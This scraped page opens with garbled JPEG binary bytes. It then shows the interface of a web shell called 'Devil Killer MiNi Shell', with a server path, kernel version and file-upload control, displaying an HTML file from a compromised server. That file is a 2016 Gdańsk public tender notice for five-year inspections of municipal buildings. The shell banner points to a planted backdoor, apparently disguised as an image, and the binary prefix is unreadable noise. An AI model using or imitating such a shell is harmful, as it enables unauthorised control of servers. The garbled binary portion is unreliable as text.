JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20160721/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20160721/149059-N-2016.html

<p class="kh_header"><b>Gdańsk: wykonywanie przeglądów 5 -letnich obiektów budowlanych będących w zarządzie GZNK SZB</b><br>
<b>Numer ogłoszenia: 149059 - 2016; data zamieszczenia: 21.07.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gdański Zarząd Nieruchomości Komunalnych - Samorządowy Zakład Budżetowy , ul. Partyzantów 74, 80-254 Gdańsk, woj. pomorskie, tel. 58 3201032, 3200220, 3023282, faks 58 3458235.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gznk.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> wykonywanie przeglądów 5 -letnich obiektów budowlanych będących w zarządzie GZNK SZB.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przeprowadzenie okresowej 5-letniej kontroli stanu technicznego i przydatności do użytkowania obiektów budowlanych, estetyki obiektów budowlanych oraz ich otoczenia oraz sprawdzenie instalacji elektrycznej i piorunochronowej zgodnie z art. 62 ust. 1 pkt. 2 Ustawy z dnia 7 lipca 1994 r. Prawo Budowlane (tekst jednolity Dz. U. z 2016 r. poz. 290 z późniejszymi zmianami) obiektów zarządzanych przez GZNK SZB na terenie BOM - 1, 2, 4, 7, 8 i 9.<br>
Kontrole okresowe należy przeprowadzić zgodnie z przepisami Rozporządzenia Ministra Spraw Wewnętrznych i Administracji z dnia 16 sierpnia 1999 r. w sprawie warunków technicznych użytkowania budynków mieszkalnych (Dz.U. Nr 74 poz. 836 z późniejszymi zmianami).<br>
Całkowita ilość obiektów wynosi 231.<br>
Wykonawca przeprowadzający kontrolę okresową budynku winien zapoznać się z protokołami z poprzednich kontroli z protokołami odbioru robót remontowych wykonanych w budynkach w okresie od poprzedniej kontroli oraz zgłoszeniami użytkowników lokali dotyczącymi usterek, wad, uszkodzeń lub zniszczeń elementów budynku oraz dokonać sprawdzenia wykonania zaleceń z poprzednich kontroli. <br>
Protokoły sporządzone w wyniku kontroli okresowej winny zawierać określenie:<br>
1. stanu technicznego elementów budynku,<br>
2. rozmiarów zużycia lub uszkodzenia elementów, o których mowa w pkt.1,<br>
3. zakresu robót remontowych i kolejności ich wykonywania,<br>
4. metod i środków użytkowania elementów budynku narażonych na szkodliwe działanie wpływów atmosferycznych i niszczące działanie innych czynników,<br>
5. zakresu nie wykonanych robót remontowych zaleconych do realizacji w protokołach z poprzednich kontroli okresowych.<br>
Wzór protokołu z przeglądu technicznego obiektu stanowi załącznik Nr 2 do umowy stanowiącej załącznik do siwz.<br>
Do protokołów z przeglądów okresowych należy dołączyć dokumentację graficzną obejmującą:<br>
- fotografie obiektu, <br>
- plan sytuacyjny z naniesieniem głównego kurka gazu, głównego wyłącznika prądowego, lokalizacji głównego wodomierza,  zaworu odcinającego instalację wewnętrzną wodociągową i ich fotografie,<br>
- pomiary instalacji elektrycznej i odgromowej,<br>
- opinię o stanie przewodów kominowych.<br>
Protokoły wraz z dokumentacją graficzną należy sporządzić po 1 egzemplarzu:<br>
- w wersji papierowej,<br>
- w wersji elektronicznej poprzez wprowadzenie ich do systemu informatycznego Zamawiającego udostępnionego poprzez sieć Internet, gdzie zostaną uzupełnione również o wymagane przez system megadane w tym w szczególności o zakres dat obowiązywania przeglądu, jego wynik (bez uwag/z uwagami, skrócony zapis uwag),<br>
według załączonych do siwz wykazów dla budynków adresowych z BOM-ów nr 1,2,4,7,8,9. <br>
Wprowadzenie do systemu informatycznego Zamawiającego należy skonsultować z Działem Informatycznym GZNK SZB.<br>
Z uwagi na fakt, że przeglądy będą stanowiły podstawę do kwalifikowania obiektów do planów remontów rocznych i wieloletnich, należy uwzględnić w nich stopień zużycia elementów i pilność remontów.<br>
W przypadku stwierdzenia występowania zagrożenia dla użytkowników obiektu lub jego otoczenia należy niezwłocznie powiadomić o tym fakcie służby techniczne BOM-u.<br>
Protokoły z przeglądów wraz z załącznikami należy sukcesywnie przekazywać inspektorom nadzoru na odpowiednich BOM-ach.<br>
Powyższy protokół wraz z dokumentacją będzie stanowił załącznik do Książki Obiektu.<br>
Wykaz budynków mieszkalnych i użytkowych będących w zarządzie GZNK SZB na terenie BOM -  1, 2, 4, 7, 8 i 9 przedstawiony jest w załączniku Nr 1 zadanie 1 i zadanie 2 do siwz.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.31.70.00-3, 71.63.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 110.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Oferta musi być zabezpieczona wadium w wysokości: 13 900,00 zł w tym<br>
Część 1 -      8 600,00  zł<br>
Część 2 -      5 300,00  zł</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełniania warunku posiadania wiedzy i doświadczenia Wykonawca musiał wykonać w okresie ostatnich trzech lat przed upływem terminu składania ofert minimum 2 usługi polegające na wykonywaniu przeglądów okresowych obiektów budowlanych zgodnie z art. 62 ust. 1 pkt. 2  ustawy z dnia 07 lipca 1994 r. Prawo budowlane (t.j. Dz. U. 2016 poz.290 z późniejszymi zmianami).<br>
W przypadku Wykonawców, którzy będą wspólnie ubiegali się o udzielenie zamówienia w/w warunek nie będzie podlegał sumowaniu. Realizacją wymaganych usług winien wykazać się wykonawca albo co najmniej jeden z uczestników konsorcjum.<br>
Warunek wiedzy i doświadczenia nie będzie spełniony, jeżeli uczestnicy konsorcjum w sumie  wykażą zrealizowanie dwóch w/w usług, ale żaden z nich nie wykona ich w wymaganej liczbie, tzn., że w przypadku wykazania przez każdego uczestnika konsorcjum po 1 usłudze, warunek dotyczący posiadania  wiedzy i doświadczenia nie zostanie spełniony.<br>
W sytuacji gdy Wykonawca nie ma wymaganego doświadczenia może polegać na wiedzy i doświadczeniu innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków udowadniając, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia. Podmiot na którego wiedzy i doświadczeniu wykonawca polega będzie musiał wykazać zrealizowanie  2 usług w zakresie określonym przez zamawiającego w siwz oraz musi być wskazany jako  podwykonawca, który będzie realizował  kluczowe usługi określone  w przedmiocie zamówienia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełniania warunku dysponowania osobami zdolnymi do wykonania zamówienia  Wykonawca musi wykazać dysponowanie minimum 3 osobami posiadającymi n/w uprawnienia tj: <br>
a) 1 osobą posiadającą przygotowanie zawodowe do pełnienia samodzielnych funkcji technicznych w budownictwie, upoważniające do projektowania lub kierowania robotami budowlanymi w specjalności konstrukcyjno -	budowlanej jako osoby do przeprowadzenia kontroli stanu technicznego budynku w zakresie ogólnobudowlanym oraz w odniesieniu do przewodów dymowych oraz grawitacyjnych przewodów spalinowych i wentylacyjnych oraz kominów przemysłowych, kominów wolno stojących i kominów lub przewodów kominowych w których ciąg kominowy jest wymuszony pracą urządzeń mechanicznych;<br>
Wykonawca może dodatkowo wykazać dysponowanie 1 osobą posiadającą kwalifikacje mistrza w rzemiośle kominiarskim jako osoby do przeprowadzenia kontroli przewodów dymowych oraz grawitacyjnych przewodów spalinowych i wentylacyjnych,<br>
b) 1 osobą posiadającą przygotowanie zawodowe do pełnienia samodzielnych funkcji technicznych w budownictwie, upoważniające do projektowania lub kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych jako osoby do przeprowadzenia kontroli stanu technicznego instalacji sanitarnych służących ochronie środowiska oraz instalacji gazowej;<br>
Wykonawca może dodatkowo wykazać dysponowanie 1 osobą posiadającą uprawnienia do wykonywania pracy na stanowisku dozoru w zakresie konserwacji, montażu, remontów, kontrolno-pomiarowym urządzeń, instalacji i sieci należących do Grupy 3. Urządzenia, instalacje i sieci gazowe wytwarzające, przetwarzające, przesyłające, magazynujące i zużywające paliwa gazowe dla urządzeń i instalacji gazowych o ciśnieniu nie wyższym niż 5 kPa zgodnie z przepisami Rozporządzenia Ministra Gospodarki, Pracy i Polityki Społecznej z dnia 28.04.2003 r. w sprawie szczegółowych zasad stwierdzania posiadania kwalifikacji przez osoby zajmujące się eksploatacją urządzeń, instalacji i sieci. (Dz.U. nr 89 poz. 828 z późn. zm.) jako osoby do przeprowadzenia kontroli stanu technicznego instalacji gazowej,<br>
c) 1 osobą posiadającą przygotowanie zawodowe do pełnienia samodzielnych funkcji technicznych w budownictwie, upoważniające do projektowania lub kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych,<br>
lub<br>
1 osobą posiadającą uprawnienia do wykonywania pracy na stanowisku dozoru w zakresie konserwacji, montażu, remontu, kontrolno-pomiarowym urządzeń i instalacji należących do Grupy 1. Urządzenia, instalacje i sieci elektroenergetyczne wytwarzające,  przetwarzające, przesyłające i zużywające energię elektryczną dla urządzeń i instalacji o napięciu nie wyższym niż 1 kV, zgodnie z przepisami Rozporządzenia Ministra Gospodarki, Pracy i Polityki Społecznej z dnia 28.04.2003 r. w sprawie szczegółowych zasad stwierdzania posiadania kwalifikacji przez osoby zajmujące się 	eksploatacją urządzeń, instalacji i sieci. (Dz.U. nr 89 poz. 828 z późn. zm.),<br>
Wyżej wymienione uprawnienia powinny upoważniać do wykonywania pomiarów ochronnych instalacji do 1 kV.<br>
jako osoby do przeprowadzenia kontroli stanu technicznego instalacji elektrycznych i piorunochronowych.<br>
Wykonawcy, którzy ubiegają się wspólnie o udzielenie zamówienia w/w warunek mogą spełniać łącznie.<br>
Wykonawca może polegać na osobach zdolnych do wykonania zamówienia innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, udowadniając, iż będzie dysponował osobami zdolnymi do wykonania zamówienia w trakcie realizacji zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Przez główne usługi Zamawiający rozumie usługi polegające na wykonywaniu przeglądów okresowych obiektów budowlanych zgodnie z art. 62 ust. 1 pkt. 2  ustawy z dnia 07 lipca 1994 r. Prawo budowlane (t.j. Dz. U. 2016 poz. 290 z późniejszymi zmianami).<br>
Zamawiający nie żąda informacji o usługach niewykonanych lub wykonanych nienależycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"></ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a) Złożyć Druk OFERTA, który należy sporządzić wg wzoru druku zamawiającego.<br>
b) Podać w złożonej ofercie części zamówienia, których wykonanie zamierza powierzyć podwykonawcy lub nazwy podwykonawców, na których zasoby wykonawca powołuje się, w celu wykazania spełnienia warunku udziału w postępowaniu. W przypadku nie wskazania podwykonawców, zamawiający uzna, że całość zamówienia będzie wykonywana przez Wykonawcę.<br>
c) Podać w ofercie, czy wybór oferty będzie prowadził do powstania u Zamawiającego obowiązku podatkowego, zgodnie z przepisami o podatku od towarów i usług.<br>
d) Sporządzić formularze według wzorów zamawiającego odpowiednio na wybrane przez siebie zadania  (zadanie 1 -  formularze cenowe BOM 1, 2, 4; zadanie 2 -  formularze cenowe BOM 7, 8, 9).<br>
e) Podać w złożonej ofercie termin wykonania zamówienia.<br>
Maksymalny termin wykonania  zamówienia nie może być dłuższy niż 110 dni. <br>
Jeżeli Wykonawca określi termin wykonania powyżej 110 dni - jego oferta zostanie odrzucona.<br>
f) Załączyć kopię dowodu wpłaty wadium wpłaconego w pieniądzu lub oryginał albo kopię wadium  wniesionego w jednej z form określonych w punkcie 14 SIWZ.<br>
g) Wykazać, że oferta została podpisana przez osobę(y) uprawnioną(e) do występowania w imieniu i na rzecz Wykonawcy</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 0.85</li>
<li>2 - Termin wykonania zamówienia - 0.15</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Następujące postanowienia umowy mogą ulec zmianie:<br>
1. Przesunięciu może ulec termin wykonania przedmiotu zamówienia. <br>
2. Zmianie może ulec ilość wykonywanych przeglądów.<br>
3. Zmianie może ulec osoba przeprowadzająca kontrole stanu technicznego budynków, jako przedstawiciela Wykonawcy pod warunkiem wcześniejszego powiadomienia Zamawiającego o tym fakcie. <br> 
4. Zmiana lub rezygnacja z podwykonawcy, na którego zasoby wykonawca powoływał się na zasadach określonych w art. 26 ust. 2b ustawy prawo zamówień publicznych, w celu wykazania spełniania warunków udziału w postępowaniu.<br>
5. Możliwość realizacji umowy przez podwykonawców (zawarcie umów o podwykonawstwo) na etapie jej realizacji, w przypadku braku zadeklarowania realizacji zamówienia przy pomocy podwykonawców na etapie składania ofert<br>
Zmiany w umowie mogą zostać wprowadzone przy zaistnieniu następujących okoliczności:<br>
1. Termin wykonania zamówienia może ulec zmianie w przypadku:<br>
a) Zaistnienia warunków atmosferycznych, które spowodowały niezawinione i niemożliwe do uniknięcia przez Wykonawcę opóźnienie w szczególności:<br>
- klęski żywiołowe, <br>
- wystąpienia niekorzystnych warunków atmosferycznych przez okres co najmniej 5 dni uniemożliwiających z przyczyn technologicznych wykonywanie prób i sprawdzeń,<br>
b) Wstrzymania wykonywania przeglądów przez Zamawiającego lub przerwy w ich wykonywaniu  powstałych na skutek okoliczności, za które ponosi odpowiedzialność Zamawiający.<br>
c) Innych  zmian spowodowanych warunkami niezależnymi i niezawinionymi przez wykonawcę.<br>
2. W przypadku wystąpienia jednej z okoliczności wymienionych w pkt 1) termin wykonania umowy może ulec odpowiedniemu przedłużeniu, o czas niezbędny do zakończenia robót budowlanych w sposób należyty, nie dłużej jednak niż o okres trwania tych okoliczności. <br>
3. Zmiana ilości wykonywanych przeglądów może ulec zmianie w przypadku:<br>
a)  Rezygnacji z realizacji niektórych przeglądów na skutek decyzji, że w interesie publicznym jest zasadne odstąpienie od ich realizacji,<br>
b) Rezygnacja z przeglądów obiektów w związku z wykupem lokali i powstania tym samym wspólnoty mieszkaniowej,<br>
c)  Wystąpienia zdarzeń losowych, np. pożaru budynku, kwalifikacji obiektu do rozbiórki, itp. <br>
4. Zakłada się, że ilość przeglądów do realizacji będzie stanowiło ok. 90% prac przewidzianych do realizacji.<br>
5. Zmiana osoby przeprowadzającej kontrole stanu technicznego budynków może nastąpić z przyczyn losowych, niezależnych od Zamawiającego i Wykonawcy np. śmierci, choroby lub w przypadku rozwiązania przez Wykonawcę umowy z osobą przeprowadzającą kontrole stanu technicznego budynków, itp. Zamawiający zaakceptuje zmianę osoby przeprowadzającej kontrole stanu technicznego budynków, gdy kwalifikacje i doświadczenie wskazanej osoby będą spełniać warunki postawione w tym zakresie w specyfikacji istotnych warunków zamówienia.<br>
6. Zmiana lub rezygnacja z podwykonawcy, na którego zasoby wykonawca powoływał się na zasadach określonych w art. 26 ust. 2b ustawy prawo zamówień publicznych, w celu wykazania spełniania warunków udziału w postępowaniu  jest możliwa w przypadku wykazania przez wykonawcę, iż proponowany inny podwykonawca (lub wykonawca samodzielnie) spełnia dany warunek udziału w postępowaniu w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia<br>
7. Zawarcie umów o podwykonawstwo na etapie realizacji umowy w przypadku braku zadeklarowania realizacji zamówienia przy pomocy podwykonawców na etapie składania ofert jest możliwa, jeżeli w stosunku do części zamówienia, na którą ma być zawarta umowa o podwykonawstwo nie została wyłączona dopuszczalność podwykonawstwa</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.gznk.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 80-171 Gdańsk, ul. Cygańska Góra 1, pok. nr 11 w godz. 9:00 - 12:00. <br>
Cena brutto -12,30 zł.<br>
Warunki i sposób płatności: zaliczenie pocztowe, przelew.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.08.2016 godzina 10:30, miejsce: siedziba Zamawiającego, 80-171 Gdańsk, ul. Cygańska Góra 1, pokój nr 11.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 31.08.2016.</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> DATA, GODZINA I MIEJSCE OTWARCIA OFERT: 02.08.2016 r. godzina  10:45, <br>
Miejsce: siedziba zamawiającego, 80-171 Gdańsk ul. Cygańska Góra 1, w  pokoju nr 6 - świetlica<br>
OSOBY UPRAWNIONE DO POROZUMIEWANIA SIĘ Z WYKONAWCAMI <br>
Marek Skuhra stanowisko służbowe inspektor ds. zamówień publicznych, <br>
80- 171 Gdańsk ul. Cygańska Góra 1, nr pok. 11, tel.  58 302 32 82<br>
Adres poczty elektronicznej: skuhra@gznk.pl<br>
ZASADY WYKLUCZENIA WYKONAWCY<br>
Z postępowania o udzielenie zamówienia Zamawiający wykluczy również wykonawcę, który w okresie 3 lat przed wszczęciem postępowania, w sposób zawiniony poważnie naruszył obowiązki zawodowe, w szczególności, gdy wykonawca w wyniku zamierzonego działania lub rażącego niedbalstwa nie wykonał lub nienależycie wykonał zamówienie, co zamawiający jest w stanie wykazać za pomocą dowolnych środków dowodowych.<br>
Zamawiający nie wykluczy z postępowania o udzielenie zamówienia publicznego wykonawcy, który udowodnił, że podjął konkretne środki techniczne, organizacyjne i kadrowe, które mając zapobiec zawinionemu i poważnemu naruszeniu obowiązków zawodowych w przyszłości oraz naprawił szkody powstałe w wyniku naruszenia obowiązków zawodowych lub zobowiązał się do ich naprawienia.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
